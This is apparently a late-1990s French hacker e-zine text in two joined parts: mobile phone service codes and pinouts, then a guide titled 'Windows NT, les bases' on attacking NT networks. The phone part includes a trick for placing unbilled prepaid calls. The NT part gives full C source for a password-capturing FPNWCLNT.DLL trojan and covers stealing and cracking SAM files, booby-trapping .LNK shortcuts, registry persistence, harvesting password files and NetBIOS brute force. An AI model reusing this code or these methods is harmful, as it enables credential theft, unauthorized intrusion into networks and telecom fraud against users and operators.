Pour voir les menus supplementaires (sur les versions les + anciennes), allez dans les 
appels non-aboutis, empty directory, pressez et maintenez la touche flechee droite, et 
choisissez le type de menu.
Pour voir les menus supplementaires (sur les versions les + recentes), allez dans READ, 
empty directory, pressez et maintenez le touche flechee gauche, et choisissez le type de 
menu. 
Pour editer le book de votre cell, allez dans le menu supplementaire, et choisissez 
"EditPh.Bk".

Comment utiliser le menu - (dans les menus supplementaires)

Choisissez 'Yes' puis on va vous demander - EditMenus? -, choisissez 'Yes'
Si le menu clignote, il n' est pas en marche.
S' il ne clignote pas, il est en service.
Vous pouvez le mettre en service ou non en choisissant 'Yes'.
Lorsque vous mettez en place un menu, vous pouvez choisir sa position.
Lorsqu' il demande l' accord, choisissez 'Non', et si la fleche est -> , 
il dit la position par la fleche droite, vous pouvez la changer en pressant '*', 
ainsi vous instaurez la place du menu en donnant le numero de la place du menu comme
ca: si votre celle inscrit "Store->2", le menu ke vous avez selectionne reste sur 
la deuxieme fleche a droite!
Lorsque tout est fait, pressez 'No', et si vous voulez changer quelque chose, pressez 
'Yes'.

____________________________
Ericsson GH688, GH788, GH768.

Codes

*#06# pour obtenir le numro IMEI (International Mobile Equipment Identity) 
*#0000# pour remettre le language en Anglais
>*<<*<* pour obtenir les informations internes au tlphone
CXC125065 - Numro de srie 
PRG 970715 1515 - Version du logiciel

 >*<<*<*> YES vrifier les chaines de texte du tlphone (1)
>*<<*<*>> YES vrifier les chaines de texte du tlphone (n)

Le menu de vrouillage du fournisseur d'accs (Service Provider (SP)) est 
utilis pour vrouiller le tlphone sur la carte SIM de votre SP. Une fois 
que le tlphone est vrouill sur un SP, si vous insrez la carte SIM d'un 
SP diffrent, le tlphone n'acceptera pas la carte.
Le tlphone peut cependant accepter une autre carte SIM du mme SP.

Pour activer / dsactiver ce verrou, il faut un code special qui n'est pas 
disponible  l'utilisateur final ;) 

Comment activer le menu de vrouillage SP.

<**< vrouiller le rseau ? si vous appuyez sur YES, vous avez 5 essais 
     pour entrer NCK.

<**<< vrouiller le sous rseau ? si vous appuyez sur YES, vous avez 5 essais 
      pour entrer NSCK.

Attention : en faisant ceci, votre tlphone peut se vrouiller sur le rseau 
d'un SP.
Si un code invalide est entr 5 fois, le tlphone sort du menu.
Aprs, le menu de vrouillage ne sera plus accessible. Un dvrouillage par 
acces direct dans l'EEPROM sera ncessaire. 

Dernire version du logiciel : <970905>

Brochage externe :
1 = + external power supply 
2 = RS232 input (TTL) 
3 = GND (digital) 
4 = RS232 output (TTL) 
5 = +5V output 
6 = Test 
7 = Mute 
8 = Internal/external 
9 = GND (analogic) 
10 = ? 
11 = BF in 
12 = BF out 

Courte description 
1: alimentation externe pour charger la batterie.
Cette alimentation branche sans la prsence d'une batterie, ne permettra pas 
d'utiliser le tlphone.
Voltage suggr 7.2V avec 600mA au moins.

2: Entre ligne srie RS232 niveau TTL (0/5V).
Quand le tlphone est allum, cette broche est  "0".

3: GND digital

4: Sortie ligne srie RS232 niveau TTL (0/5V).
Quand le tlphone est allum, cette broche est  "1".

5: Sortie +5V quand le tlphone est allum.

6: Mode test. En general, est a "0". Pour basculer en mode test, eteindre le 
telephone, mettre la broche a "1" (+5V), allumer le tlphone. Dans ce mode, 
la ligne serie marche  115200 au lieu de 9600 en mode normal.

7: Mute. Normalement a "0", passe a "1" durant une conversation.
Pratique pour couper l'autoradio par exemple.

8: Si ouvert, le micro et le haut-parleur internes sont actives. Si a "0", 
ceux en externe seront activs.

9: GND analogic.

10: Cette broche est encore inconnue. Elle parait atenuer le micro et le 
haut-parleur lorsqu'elle est a "0".

11: entre BF.

12: Sortie BF.

Comment communiquer avec le telephone ? ?
La ligne serie dialogue en mode 9600 n 8 1. 
En fait, elle repond aux commandes AIES "at" mais rien de plus. 


Astuces
Raccourci pour le menu des derniers numeros composes :
Ce menu est accessible en pressant la touche YES, mais l'est aussi en 
pressant "0" puis "#".

Lorsque le telephone est eteind, et qu'il n'est pas en chargement, le 
niveau de batterie peut etre affiche pendant une periode tres courte en 
pressant tres rapidement la touche "NO". Ainsi l'indicateur de batterie 
s'affiche pendant environ 2 secondes.

Nom complet du reseau :
Pour afficher le nom complet du reseau, aller dans le menu "RESEAUX", et 
usiliser "SELECTION" ou "LISTE" pour afficher les reseaux disponibles. 
Ensuite, presser "*" pour afficher le nom complet du reseau desire.

Pour afficher la liste complete des operateurs acceptes par votre 
telephone, aller dans la fonction "LISTE" du menu "RESEAUX". Losque le 
telephone a fini sa recherche, presser "<" puis deux fois "YES". La liste 
complete des operateurs s'affiche. Utiliser "<" et ">" pour se deplacer 
dans la liste.

Appels gratuits :
Ce procede ne semble marcher qu'avec les cartes prepayees, et uniquement 
dans certains pays.
La carte prepayee, est une carte SIM qui possede un certain nombre de 
credits, tout comme une telecarte normale.
Composer le numro et presser "YES". Une fois que le message "CONNECTE" 
s'affiche :
Presser "CLR" puis "0" puis "#" puis deux fois "NO" pour eteindre le telephone.
On peut encore converser au telephone, mais la carte SIM n'enregistre pas 
l'appel (selon les pays).
A la fin de l'appel, le seul moyen de remettre le telephone en etat normal,
 est de retirer la batterie.

IMEI (International Mobile Equipment Identity): 
XXXXXX-XX-XXXXXX-X 
TAC    FAC SNR   SP 

TAC = Type Approval Code (first 2 digits = country code of the 
approval-country ) 

FAC = Final Assembly Code (01,02 = AEG) 
(10 Nokia) 
(41,44 Siemens) 
(51 Sony,Siemens,Ericsson) 
SNR = Serial Nr. 

SP = Spare (always "0") 

__________
Nokia 6110

Pour voir le numero IMEI: *#06#
Pour voir la version du Software: *#0000#
1ere Ligne - Version du Soft
2eme Ligne - Date de sortie du Software 
3eme Ligne - Type de cell.
Pour avoir plus d' infos sur le cell (numero de serie): *#92702689# 

1er  Ecran - Date de fabrication du cell
2eme Ecran - # de Serie, IMEI
3eme Ecran - Date d' achat
4eme Ecran - Derniere date de reparation
 
*3370# pour avoir une meilleure qualite d' appel
[ce qui diminue la duree de vie de la batterie]
#3370# pour enlever cette option
Note: apres avoir presse ces touches, le cell se reinitialisera avec l' option choisie.

*4720# pour activer une qualite moyenne sur le GSM
[la qualite baisse, mais la duree de la batterie augmente de 30%]
#4720# pour desactiver cette option.

__________
NOKIA 5110

Pour voir le numero d' IMEI: * # 0 6 # 
Pour voir la version du soft: * # 0 0 0 0 #  Derniere version: V. 4.59 (01-06-98)
Puis vous verrez: la version du soft, sa date de sortie, le type de cell.
Pour avoir + d' infos a propos du cell, entrez: * # 9 2 7 0 2 6 8 9 # 
Vous verrez la date de fabrication, le numero de serie, et le numero IMEI, 
la derniere date de reparation.
Pour ameliorer la kalite d' appel, et diminuer la vie de la batterie, entrez * 3 3 7 0 # 
(pour l' enlever, tapez # 3 3 7 0 #).
Pour diminuer la kalite d' appel et augmenter la duree de vie de la batterie, tapez 
* 4 7 2 0 #
(pour l' enlever, tapez # 4 7 2 0 #).
Pour trouver rapidement et composer un numero, pressez <arrow down> puis la premiere 
lettre du nom
(pour john, pressez 5).
Pour changer rapidement le profil du cell, pressez <on/off> deux fois rapidement, 
en attendant d' avoir le choix du profil, puis maintenez la touche <on/off> enfoncee.
 
__________
Nokia 3110 

Pour voir le numero d' IMEI: * # 0 6 # 
Pour voir la version du soft:*#3110# 

Par exemple:

V 07.11 Version du Software. 
24-09-97 Date de sortie du software.
NHE-8 Type de phone.

La derniere version connue est: V 7.32 

Tapez *#92702689# . 
Un code va vous etre demande:
6232 (OK) : Montre l' annee et le mois de fabrique.
7332 (OK) : Montre la date de la derniere reparation
7832 (OK) : Montre la date de vente du cell.
9268 (OK) : Montre le numero de serie.
37832 (OK) : Pour etablir la date de vente (a n' utiliser k' une seule fois).
87267 (OK) : Pour confirmer le transfert.
Pour verifier si l' horloge SIM peut etre stoppee: *#746025625#
Pour initailiser la configuration: *#7780# 

Pinouts

Desktop Charger----------------------|
             |                       |
	       |                       |
CHARGER--|   +	    TOP OF PHONE   -
         V   V	1  2  3  4  5  6   V	
        (o) | |  [=  =  =  =  =  =] | |
                  7  8  9  10 11 12

 
______________________
Nokia 2110i/2110e/9000

IMEI
Pour voir le numero d' IMEI: * # 0 6 # 
Pour mettre en marche l' id, entrez *#30#[SEND] . Pour le call-blocking, entrez *#31#[SEND] 
Pour permettre de voir les sites de cells, [MENU] 4 9 1
Pour avoir la version du software sur les 2110e / 2110i, entrez *#170602112302#
Pour les versions plus recentes: *#682371158412125#
The phone should display something similar to this:
V 5.31      Version du soft
06-01-96    Date de fabrication
NHE-4       modele GE8 = 9000?

Kelkes raccourcis pour les 2110i !

Entrez : * puis 'Memory' puis 'Find' ou *  et la fleche du bas
Resultat : Vous apercevez les appels recus.
Entrez : + puis 'Memory' puis 'Find' ou + et la fleche du bas
Resultat : Vous apercevez les appels mankes.
Pressez 'Menu', puis le bouton 'vert' vous permet de transmettre les codes DTMF.

__________________________________________________________
Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 & 8700

*#06# donne l' IMEI pour les 8700, mais pas pour les 6200, 7500, 8200
Pour activer la RBS (Radio Base Station):
('pause' signifie ke la touche * est pressee en attendant ke la fenetre apparaisse)
[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
Vous devez maintenant presser [MENU] et naviguer jusk'a la fonction 'Eng Field Options', 
et le valider?
Pour desactiver la RBS:
[pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
Cela ne fonctionnera k' avec certaines versions de softwares.
Utilisation de la RBS:
Distance a la station - Faites un appel. Lorsque ca repond, pressez [MENU] tant 
ke 'Eng Field Option' apparait, pressez [OK], selectionnez 'Active Cell', pressez 
[OK], pressez [MENU] tant ke 'Time Adv xxx' apparait, xxx etant un numero. Multipliez 
ce numero par 550, et le resultat est la distance entre votre cell et la RBS, en metres.

Qualite du signal - pressez [MENU] tant ke 'Eng Field Option' apparait, pressez [OK],
selectionnez 'Active Cell', pressez [OK], pressez [MENU] tant ke 'C1' apparait. C' est 
la qualite du signal. Si ca reste negatif pendant plus de 5 secondes, un nouveau cell 
est selectionne.

______________
Panasonic G500 

Pour voir le numero d' IMEI: * # 0 6 # 
PINOUTS
1 - Ground
2 - TX_Audio
3 - Audio_Ground
4 - HF_ON (L=ON) -> L=H/F ON
5 - AOP_Sense <- Selection de l' adaptateur DATA
6 - Serial_Up <- UART up (9600,33.8kbps)
7 - Serial_Down -> UART down
8 - External_Power <- Puissance pour le rechargement
9 - Ground
10 - RX_Audio
11 - Radio_Mute -> L=MUTE
12 - HF_Sense <- L=H/F MODE
13 - Reserved L=FLASH WRITE ENABLE
14 - Ignition <- H=ON
15 - Logic_Power -> H=HANDSET ON
16 - PAON -> Power Amplifier Control Signal

_________________
Philips PR 747/II 

Ce sont les memes codes que pour le Nokia 6110

____________
Philips FIZZ

IMEI: *#06#
Lock Code: *#1234#
Pour avoir la version du software, entrez *#8377*#
Le resultat donnera kelke chose du genre:
Version : 0916 - EEPROM : 00000000-00 - TDA : 2445 - KISS : 0502 SIM-LCK
..ou pour d autres versions de soft: *#5644*#
Resultat:
Version : 09162205 - EEPROM : 00000000-00 - TDA : 2445 - KISS : 0502 SIM-LCK
Pinouts pour Fizz et Spark
1	GROUND
2	GROUND
3	HANDS FREE ON/OFF
4	MUTE
5	TX
6	RX
7	RTS
8	REPROGRAMMING
9	ON HOOK CHARGER (a peu pres 13V? a 14V)
10	AUX MIC
11	AUX SPEAKER
12	GROUND

_____________
Philips GENIE

IMEI: *#06#
*#2254*# est le status de l' enregistre: C, BS, RR, MMI, CREAT.
*#2255*# active et desactive le mode "DEBUG CALL".
*#2558*# affiche le temps en jours, heures et minutes du temps depuis lekel vous etes 
connecte au reseau GSM
Pour forcer une reconnection au reseau: *#2562*# 
Pour voir et modifier les codes de securite du telephone: *#7489*# 
Pour voir des infos sur votre carte SIm, comme le nom: *#7378*# 
Pour avoir des infos sur le SIM lock, Init et Flags: *#3377*# 
Pour activer et desactiver le sleep mode: *#7693*# 
Pour avoir des infos sur le sleep mode: *#8463*# 

_____________________
Siemens S1/S3:comfort

MONITOR MODE
Les series Siemens S1/S3 ont un mode moniteur ki peut etre active
directement par le clavier. Pour activer ce mode, vous devez entrer le code 
special d' acces programme dans le telephone.
Protocole:
Allumez le telephone
Entrez le code d' acces du PIN, et pressez [OK].
Pressez [Menu].
Pressez [9]. 
Pressez [8] (ca peut etre le [7] sur certains cells).
Vous devriez voir votre IMEI 
Pressez la touche en haut a gauche du menu.
7684666 
Touche de raccrochage.

____________________________________
Siemens S4/S4 Power ; Sony CM DX 100

MONITOR MODE
Idem ke pour les S1/S3, sauf k' il faut presser [7] au lieu de [8].
Presser le bouton droit d' affichage lorske vous etes en monitor mode 
permet de montrer une liste de 6 cells ayant les plus forts signaux.

Indicateurs du mode Test:   (* = seulement dispo lors d' un appel)

CH	Numero du canal
RX	Force du signal (dB)
N	NCC (Color Code)
B	BCC (Color Code)
CI	Cell ID (en Hex)
C1+	temps avant ke le cell force la connection. (see RX and RXAM)
LAI	Location Area Identity. Montre le code Id du reseau (42F010 = 240.01)
        et MSC
TXPWR	Puissance de transmission (dB)
RXAM	Force du signal recu.
TS*	Temps de coupure
TA*	Distance a la Tour en Km X 2
PL*	Niveau de Puissance

	Tableau de puissance
	PL:	5    6     7    8    9   10    11   12   13   14   15
	dB:	33  31    29   27   25   23    21   19   17   15   13
	Watts:  2   1.3   .8   .5   .3   .2   .13  .08  .05  .03  .02

LF*	C1 valeur avec transmission continue de la Tour
LS*	C1 valeur avec transmission discontinue de la Tour
QF*	Taux d' erreur avec transmission continue de la Tour
QS*	Taux d' erreur avec transmission discontinue de la Tour
 
        Tableau du taux d' erreur (BER= Bit Error Rate)
        QF/QS register:  0     1     2     3     4     5     6     7
        % of bit sent:	0.2   0.8   0.4   1.6   3.2   6.4  12.8  25.6




(`'.(`'._.`._.`.(`'. .').`._.`._.').')  
 ) Windows NT, les bases #1  )    2.6    (          cyberjunk        (   
(_.'(_.'`._.`._.(_.'`'._)`._.`._.`'._)`'._)


From:   Cyberjunk [Snipper@Hotmail.com | www.multimania.com/cybjunk]
To: 	Cryptel E-Zine
Cc: 	Internet =)

--------------------------------------------------------------------
 
1. Introduction

2. Les rseaux Windows NT
	2.1 Les protocoles

3. Les fichiers SAM.*
	3.1 Ou sont-ils ?
	3.3 Hack de NT en local
	3.2 Comment cracker les mots de passe ?

4. Les commandes NET
	4.1 Gestion des utilisateurs
		- Net Accounts
		- Net Group
		- Net Localgroup
		- Net User
	4.2 Informations systme
		- Net Computer
		- Net Config
		- Net Config Server
		- Net Session
	4.3 Ressources rseau
		- Net Continue/Pause
		- Net File
		- Net Share
		- Net Start/Stop
		- Net Use
		- Net View
		
5. Les chevaux de troie
	5.1 FPNWCLNT.DLL
	5.2 Les raccourcies (.LNK)
	5.3 Ou le mettre pour qu'il se lance au demmarrage ?
	5.4 Quelque ides de conception

6. Windows 95/98, Failles de scurit dans un domaine Windows NT

[ Rem: Cette partie ne traite pas le mthode Netbios ]

	6.1 Qui a dit que NetBios tait pour les lames ?
	6.2 Rcupration de donnes pour une attaque sur NT
	6.3 NAT [NetBios Auditing Tool]
	
7. Fin
--------------------------------------------------------------------




1. Introduction
--------------------------------------------------------------------

	Tout d'abord je tiens  prciser que ce texte n'est pas un RIP,
mais il est oblig qu'il ressemble  certain autre vu le nombre d'article
qui parle dj de NT. A quoi sert -il ? ou A qui est-il destin alors ? 
Dj, il est en franais, et a mon avis il est destin  ceux qui ont 
envi de se mettre  jour. La triste vrit est l ... Windows NT s'impose
dans le monde (impitoyable =) ) des serveurs... Il devrait vous permettre
d'aller un plus loin que le NetBios, ou de comprendre des rseaux Microsoft
dans votre universit par exemple ou encore de bien prparer la future 
doc de Rhino 9, NT War Doc si vous n'tes pas familier avec ce systme.



2. Les rseaux Windows NT
--------------------------------------------------------------------

2.1 Les protocoles

Windows NT commme la pluspart des OS Rseaux, accepte plusieurs protocoles et
les fait fonctionner cte  cte. 

------------------+-------------------------------------------------------------
+ NetBios/NetBeui | C'est le plus simple de tous les protocoles. developp par
		      | Microsoft, au temps du MsDos. Il comporte moins de 20
		      | commandes. ( Cf  wsnetbs.h etc ... )
------------------+-------------------------------------------------------------
+ NWlink          | A partir de NT 3.5x. J'en sais pas plus. 
------------------+-------------------------------------------------------------
+ TCP/IP          | Je pense que c'est la peine de m'attarder la dessus.
------------------+-------------------------------------------------------------
+ DLC             | Le protocole Data Link Control s'appuie sur le standart
		      | 802.2 et est utilis entre NT et les calculateurs Mainframes
		      | ou des composants spcifiques commme les cartes JetDirect(HP)
		      | ou markVision (LexMark). Tous ca pour dire, que vous risquez 
		      | de le croiser de temps  autre.
------------------+-------------------------------------------------------------
+ IPX/SPX         | Rseaux utiliss pour communiquer avec NetWare (Novell)
		      | sachant que NT n'a pas besoin de novell pour un LAN.
------------------+-------------------------------------------------------------


3. Les fichiers  SAM.*
--------------------------------------------------------------------

3.1 Ou sont ils ?

En fait sur un systme NT Server, les mots de passe sont enregistrs dans un fichier
appeller Sam, WINNTsystem32ConfigSam. Le problme de celui ce c'est qu'il est
en utilisation permanente par le systme. Donc il vous est impossible de l'ouvrir,
et de le copier. Pour remedier a ce probleme, il existe de petit executable qui se
chargeront pour vous de pouvoir vous autoriser a manipuler le fichier cible 
(samdump.exe par exemple).
Par contre il faut savoir qu'il existe un autre Sam sur WINNTRepairsam._ 
Celui-ci est crer a l'installation de windows et contient donc
le password administrateur.

Rem: A l'inverse du premier, il n'est pas en utilisation permanente.
----

Ces fichiers (l'un ou l'autre) deviennet donc la cible d'une attaque 
sur NT, car l'important c'est d'avoir l'admin pour des raisons simples,
avoir les droits d'accs totals sur la machines, et bien souvent
sur tout le rseau =) .

3.2 Hack de NT en local

Une technique tres simple consiste a booter avec une disquette dos,
monter la partition NTFS avec 'ntfsdos.exe' et aller chercher le 
fichier de mot de passe. 
Une autre, bas sur le mme principe, peut se faire depuis Linux.
Comme c'est le cas dans mon univ, nous avons Linux/Nt en multiboot.
On peut donc monter la partition Ntfs et aller chercher le fichier.

Rem: Il faut tre root pour utiliser la commande mount.
----

3.3 Comment Cracker les mot de passe ?

L0pht (www.l0pht.com) sont auteur d'un tres beau shareware appeller L0phtcrack,
qui permet d'ouvrir un Sam, et de lancer du brute force dessus. Assez pratique 
la version actuelle contient mme le samdump intgr. 
Pour ce qui est du shareware, vous pouvez l'utiliser pendant 1 semaine.
Mais bon, je vou cacherez pas que le crack est dispo sur astalavista =)
Toute fois, il y a aussi un programme en C dispo dans Phrack Issue 50,
www.phrack.com (www.2600.com/phrack). Choisissez votre arme =)


4. Les commandes NET
--------------------------------------------------------------------

Sous NT, pratiquement tout peut se tre paramtr en utilisant ces commandes.
L'intert du paragraphe suivant n'est pas de re-ecrire l'aide ... =)
Mais en fait, de vous faire voir ce qui est a votre porte depuis
une station de travail, comment obtenir des informations sur les utilisateurs 
ou mot de passe par exemple ou encore comment faire des manips interessantes par rapport
 la config rseaux (Domaines, Partage etc ....) 
L'interet secondaire de ces commandes, est de pouvoir ecrire des script intressant ... =)
En rapport avec les chevaux de trois !!! Mais vous l'aviez dja compris... j'en suis sr !

4.1 Gestion des utilisateurs

Net Accounts
============

Si vous taper cette commande sans paramtre vous obtenez les infos relatifs
au mot de passe, dure de validit, nombre de caractres ...

--------------------------------+---------------------------------------------------------
/FORCELOGOFF:[minutes|NO]       | Indique en minute la dure d'une session usr sur le
				        | serveur. Par dfaut epche une dconnexion force.
--------------------------------+---------------------------------------------------------
/MINPWLEN:[longueur]            | Taille du mot de passe
--------------------------------+---------------------------------------------------------
/MAXPWAGE:[jour|unlimited]      | Dure en jour de la validit des mot de passe
--------------------------------+---------------------------------------------------------
/MINPWAGE:[jours]		        | Au bout de combien de jour le pass doit etre changer
--------------------------------+---------------------------------------------------------
/UNIQUEPW:[nombre]		  | Repete le MEME mot de passe. Valeur max 8
--------------------------------+---------------------------------------------------------
/DOMAIN                         | La commande s'excutera sur le Serveur de domaine et pas
				        | en local.
--------------------------------+---------------------------------------------------------


Net Group
=========

Affcihe les noms de groupe sur le serveur.

--------------------------------+---------------------------------------------------------
/ADD    			| Ajoute un groupe
--------------------------------+---------------------------------------------------------
/DELETE		                | Supprime un groupe
--------------------------------+---------------------------------------------------------
/DOMAIN				| La commande s'excutera sur le Serveur de domaine et pas
				| en local.
--------------------------------+---------------------------------------------------------


Net Localgroup
==============

Mme chose sur la machine locale.

Net User
========

Permet de grer les comptes utilisateurs sur le serveur.
Mme si vous tes sur un station de travail, cette commmande
n'agit que sur le serveur.

Exemple: net user login_user mot_de_pass [POUR LA SUITE VOIR LES PARAMS SUIVANTS]

--------------------------------+---------------------------------------------------------
/ADD    			        | Ajoute un user
--------------------------------+---------------------------------------------------------
/DELETE		              | Supprime un user
--------------------------------+---------------------------------------------------------
/DOMAIN	                    | La commande s'excutera sur le Serveur de domaine et pas
                                | en local.
--------------------------------+---------------------------------------------------------
/ACTIVE:[YES|NO]		        | Active ou dsactive un compte user
--------------------------------+---------------------------------------------------------
/EXPIRES:[date|NEVER]           | Faire dsactiver un user a une date spcifique
--------------------------------+---------------------------------------------------------
/HOMEDIR:chemin                 | Chemin du dossier de basede l'usr
--------------------------------+---------------------------------------------------------

4.2 Informations systme

Net Computer
============

Ajouter un ordinateur dans un domaine.

Exepmle: NET COMPUTER \ip_de_l_ordi [PARAMATRES]

--------------------------------+---------------------------------------------------------
/ADD    			        | Ajoute un ordi
--------------------------------+---------------------------------------------------------
/DEL		                    | Supprime un ordi
--------------------------------+---------------------------------------------------------

Net Config
==========

Renvois des infos d'une machine.

Exemple: NET CONFIG [PARAMETRE]

--------------------------------+---------------------------------------------------------
SERVER    			        | Renvoie des infos sur la config du server
--------------------------------+---------------------------------------------------------
WORKSTATION	                    | idem pour la station de travail
--------------------------------+---------------------------------------------------------

Net Config Server
=================

Permet de configurer de faon particulire les serveur.

Exemple: NET CONFIG SERVER [PARAMETRE]

--------------------------------+---------------------------------------------------------
/AUTODISCONNECT:m		        | Dure de la dconnexion automatique si inactivit
--------------------------------+---------------------------------------------------------
/HIDDEN		              | Permet de cacher un ordi lorsque l'on demande d'afficher
				        | la liste des serveurs.
--------------------------------+---------------------------------------------------------

Net Session
===========

Appelle et termine les sessions d'un ordi du rseaux.

Exemple: NET SESSION \ip_ordi [PARAMETRE]

--------------------------------+---------------------------------------------------------
/DELETE				  | Termine la connexion sur un autre ordi
--------------------------------+---------------------------------------------------------

4.3 Ressources rseau

Net Continue/Pause
==================

Suspend ou active un service.

Exemple: NET PAUSE/CONTINUE [service]

Net File
========

Disponible que sur les serveurs, cette commande permet de ferme les fichiers partag et
Sans option elle renvoi la liste des fichiers ouverts sur le serveur avec leurs numro.

Exemple: NET FILE [numro|/DELETE]

--------------------------------+---------------------------------------------------------
/CLOSE				  | Ferme le fichier
--------------------------------+---------------------------------------------------------

Net Share
=========

La commande NET SHARE permet de consulter et de modifier les partages d'un serveur.
Sans option, elle renvoient des informations sur les ressources partages.

Exemple: NET SHARE nom_de_partage=chemin [PARAMETRES]

--------------------------------+---------------------------------------------------------
/USERS:nombre  			  | Nbe de user ouvant y aller en mme temps
--------------------------------+---------------------------------------------------------
/DELETE		              | Arrette le partage
--------------------------------+---------------------------------------------------------

Net Start
=========

Arrette ou demarre un service.

Exemple: NET START/STOP [service]

Net Use
=======

Elle permet de se connecter a un ordianteur distant.
Sans option elle renvoie la liste des ressources partages d'un ordinateu avce
quelques bien spcifique.

Exemple: NET USE \Ip_de_l_ordi [mot_de_passe] [PARAMETRES]

--------------------------------+---------------------------------------------------------
/USER user			        | Nom de l'utilisateur avec lequel la connexion sera 
				        | tablie (login...)
--------------------------------+---------------------------------------------------------
/HOME	  	                    | Relie l'utilisateur a son dossier d'origine (HOME ...)
--------------------------------+---------------------------------------------------------
/DELETE			        | Terminer une connexion
--------------------------------+---------------------------------------------------------
/PERSISTENT [YES|NO]		  | Rtablir a la prochaine ouverture ?
--------------------------------+---------------------------------------------------------

Net View
========

Affcihe les ressources partages.

Exemple: NET VIEW \ip-de_l_ordi
		
5. Les chevaux de troie
--------------------------------------------------------------------

5.1 FPNWCLNT.DLL
[Trouver dans le MHD de Rhino9 ]

Cette Dll permet d'obtenir des noms d'utilisateurs et des mots de passe si le
rpertoire WinNTSystem32 est en mode Lecture et Ecriture. Le rsultat est
mis dans un fchier sur 	emp.
Pour ma part je n'ai jammais trouver de tel systme pour l'instant mais voila
quand mme la source .. Au cas ou v tes plus chanceux que moi. :)

------------- cut --------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

struct UNI_STRING {
  USHORT len;
  USHORT maxlen;
  WCHAR *buff;
  };

static HANDLE fh;

BOOLEAN __stdcall InitializeChangeNotify ()
{
  DWORD wrote;
  fh = CreateFile("C:\temp\pwdchange.out", GENERIC_WRITE,
    FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
    0);
  WriteFile(fh, "InitializeChangeNotify started
", 31, &wrote, 0);
  return TRUE;
}

LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
  struct UNI_STRING *passwd)
{
  DWORD wrote;
  WCHAR wbuf[200];
  char buf[512];
  char buf1[200];
  DWORD len;

  memcpy(wbuf, user->buff, user->len);
  len = user->len/sizeof(WCHAR);
  wbuf[len] = 0;
  wcstombs(buf1, wbuf, 199);
  sprintf(buf, "User = %s : ", buf1);
  WriteFile(fh, buf, strlen(buf), &wrote, 0);

  memcpy(wbuf, passwd->buff, passwd->len);
  len = passwd->len/sizeof(WCHAR);
  wbuf[len] = 0;
  wcstombs(buf1, wbuf, 199);
  sprintf(buf, "Password = %s : ", buf1);
  WriteFile(fh, buf, strlen(buf), &wrote, 0);

  sprintf(buf, "RID = %x
", rid);
  WriteFile(fh, buf, strlen(buf), &wrote, 0);

  return 0L;
}
------------- cut --------------


4.2 Les raccourcies (.LNK)

Le grand intert de ces fichiers  c'est que si vous pouvez les modifer et glisser
un de vos gentils script  l'interieur. Je m'explique =)

Vous avez chez vous prpar un .Bat (Ou un .Reg)  en jouant avec les commandes NET,
qui Partage le repertoire de celui qui l'execute.
Admettons, que sur le bureau commun aux utilisateurs traine un wordpad.lnk.
Si vous avez les droits, rien ne vous empche de lancer un script 
qui partagera le repertoire HOME de l'utilisateur et qui apres qui lance wordpad.
Une autre application, pourait ce passer sur serveur partag ou tout le monde
met ce qu'il veut. Assez frquent dans les universits pour mettre en comun
des ressources. Il Pourrait trainer par la un Pussy.lnk ..
ou vous pourriez modifer les raccourcis Microsoft Office...
Enfin bref, de toute faon je vous  je vous fais confiance pour trouver
ce qu'il faut, et de toute faon ca depend extremement du server.
Il n'y pas de rgle en gnral, sauf peut-tre que le TEMP est tres souvent
en accs complet pour tous les utilsateurs.

5.3  Ou le mettre pour qu'il se lance au dmmarage ?

Pour faire excuter une commande au dmarrage vous avez le choix
entre le menu dmarrer ou la base de registre.

Les rpertoire suivant corresponde au Menu Dmmarrer :

- C:WinNTProfilesDefault UserStart MenuProgramsStartUp ~ US
- C:WinNTProfilesDefault UserMenu DmarrerProgrammesDmarrage ~ FR

Sinon vous pouvez aussi le placer dans la base de registre:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

Faites, Ajouter Chines, Puis taper le chemin de votre Script.

5.4 Quelques ides deconception:

Grce au commande NET, vous pouvez donc pratiquement configurer 
ou reconfiguer tous les paramtres rseaux et donc par
consquences obtenir pratiquement ce que vous voulez d'un 
utilisateur.

Points intressants:
---------------------

N'oubliez pas que si vous n'avez pas les droits
pour aller dans des rpertoires cl du systme, certain eux l'ont, 
arrang vous donc qu'il lance votre script et qu'il facent ce que vous vouliez
ou carrement qu'il vous donne les droits =)

Un autre exepmle serait de faire ajouter un Super-utilsateur qui
disparaitra au bout de 1 jour par exepmle. 

Je vous conseille vraiment d'installer WinNT et de tester vos programmes en Local.

6. Windows 95/98, Failles de scurit dans un domaine Windows NT
--------------------------------------------------------------------

Cette parti ne re-explique pas la methode NetBios mais  pour
objectif de vous montrer quelques techniques d'attaques sur un
serveur NT, en passant par des machines 95 ou 98 accssible NetBios.

6.1 Qui a dit que NetBios tait pour les lames ?

Je tiens a rappeller pour ce qui avait dja mis NetBios au placard,
peuvent ressortir leur attirail. Malgres le fait que ce procd
soit tres connus par la pluspart d'entre vous, je vous garantie qu'il
marche encore tres bien (Surtout chez les petits ISP locaux),
et c'est parfois un faille dans un rseau NT pourtant scuris.


6.2 Rcupration de donnes pour une attaque sur NT

Notre objectif reste toujours un serveur NT. Sur la machine 95, ramassez tout
ce qui tourne autour des utilisateurs.

- .pwl       ~ Mot de passe de login sous 95, forte chance pour 
	       que ce soit les meme que pour NT.		    [CRYPTE]
- ws_ftp.ini ~ Contient des mots de passe sauvgards sur accs FTP. [CRYPTE]
- pmail.ini  ~ Contient des mots de passe de messagerie,
	       par fois c'est le mme que le password de login.	    [CRYPTE]

- eudora.ini ~ Idem						    [CRYPTE]
- mirc.ini   ~ regarder la configuration du proxy. 		    [CLAIR]
- etc ...

Une fois des mots de passe trouvs,  cela vous constitue un bon petit
dicotionnaire pour NAT.

6.3 NAT [NetBios Auditing Tool]

Je pense que la majorit d'entre vous le connaissent dj mais je tenniat  le rappeller.
Ce petit utilitaire, permet de faire du brut force sur des ressources partag.
Son instalaltion est simple, un fichier contenant les noms d'utilisateurs et
l'autres les mots de passes.

NAT.EXE Disponible sur Technotronic.
Interface graphique, Disponible sur Rhino9.

7. Fin
--------------------------------------------------------------------

Bon voil cest fini ... 
Bonne chance  tous ! Le savoir nest pas un crime ni les travaux pratiques.

* Special msg: La paranoa nous sauvera ...

Have Phun !



